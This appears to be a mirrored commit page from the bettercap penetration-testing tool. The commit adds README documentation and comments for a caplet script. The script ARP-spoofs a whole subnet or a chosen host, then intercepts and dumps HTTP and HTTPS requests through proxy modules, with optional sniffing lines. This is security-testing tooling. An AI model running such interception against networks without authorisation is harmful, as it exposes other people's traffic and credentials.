mirror of
https://github.com/bettercap/bettercap
synced 2025-08-20 05:23:19 -07:00
balls
This commit is contained in:
parent
c03c943ddc
commit
a1d96165cf
2 changed files with 39 additions and 1 deletions
34
README.md
34
README.md
|
@ -130,6 +130,40 @@ You can have module specific help by using `help module-name` (for instance try
|
||||||
|
|
||||||
Interactive sessions can be scripted with `.cap` files, or `caplets`, the following are a few basic examples, look the `caplets` folder for more.
|
Interactive sessions can be scripted with `.cap` files, or `caplets`, the following are a few basic examples, look the `caplets` folder for more.
|
||||||
|
|
||||||
|
#### caplets/http-req-dump.cap
|
||||||
|
|
||||||
|
Execute an ARP spoofing attack on the whole network (by default) or on a host (using `-eval` as described), intercept HTTP and HTTPS requests with the `http.proxy` and `https.proxy` modules and dump them using the `http-req-dump.js` proxy script.
|
||||||
|
|
||||||
|
```sh
|
||||||
|
# targeting the whole subnet by default, to make it selective:
|
||||||
|
#
|
||||||
|
# sudo ./bettercap-ng -caplet caplets/http-req-dump.cap -eval "set arp.spoof.targets 192.168.1.64"
|
||||||
|
|
||||||
|
# to make it less verbose
|
||||||
|
# events.stream off
|
||||||
|
|
||||||
|
# discover a few hosts
|
||||||
|
net.probe on
|
||||||
|
sleep 1
|
||||||
|
net.probe off
|
||||||
|
|
||||||
|
# uncomment to enable sniffing too
|
||||||
|
# set net.sniff.verbose false
|
||||||
|
# set net.sniff.local true
|
||||||
|
# set net.sniff.filter tcp port 443
|
||||||
|
# net.sniff on
|
||||||
|
|
||||||
|
# we'll use this proxy script to dump requests
|
||||||
|
set https.proxy.script caplets/http-req-dump.js
|
||||||
|
set http.proxy.script caplets/http-req-dump.js
|
||||||
|
clear
|
||||||
|
|
||||||
|
# go ^_^
|
||||||
|
http.proxy on
|
||||||
|
https.proxy on
|
||||||
|
arp.spoof on
|
||||||
|
```
|
||||||
|
|
||||||
#### caplets/simple-password-sniffer.cap
|
#### caplets/simple-password-sniffer.cap
|
||||||
|
|
||||||
Simple password sniffer.
|
Simple password sniffer.
|
||||||
|
|
|
@ -2,22 +2,26 @@
|
||||||
#
|
#
|
||||||
# sudo ./bettercap-ng -caplet caplets/http-req-dump.cap -eval "set arp.spoof.targets 192.168.1.64"
|
# sudo ./bettercap-ng -caplet caplets/http-req-dump.cap -eval "set arp.spoof.targets 192.168.1.64"
|
||||||
|
|
||||||
|
# to make it less verbose
|
||||||
# events.stream off
|
# events.stream off
|
||||||
|
|
||||||
|
# discover a few hosts
|
||||||
net.probe on
|
net.probe on
|
||||||
sleep 1
|
sleep 1
|
||||||
net.probe off
|
net.probe off
|
||||||
|
|
||||||
|
# uncomment to enable sniffing too
|
||||||
# set net.sniff.verbose false
|
# set net.sniff.verbose false
|
||||||
# set net.sniff.local true
|
# set net.sniff.local true
|
||||||
# set net.sniff.filter tcp port 443
|
# set net.sniff.filter tcp port 443
|
||||||
# net.sniff on
|
# net.sniff on
|
||||||
|
|
||||||
|
# we'll use this proxy script to dump requests
|
||||||
set https.proxy.script caplets/http-req-dump.js
|
set https.proxy.script caplets/http-req-dump.js
|
||||||
set http.proxy.script caplets/http-req-dump.js
|
set http.proxy.script caplets/http-req-dump.js
|
||||||
clear
|
clear
|
||||||
|
|
||||||
|
# go ^_^
|
||||||
http.proxy on
|
http.proxy on
|
||||||
https.proxy on
|
https.proxy on
|
||||||
arp.spoof on
|
arp.spoof on
|
||||||
|
|
||||||
|
|
Loading…
Add table
Add a link
Reference in a new issue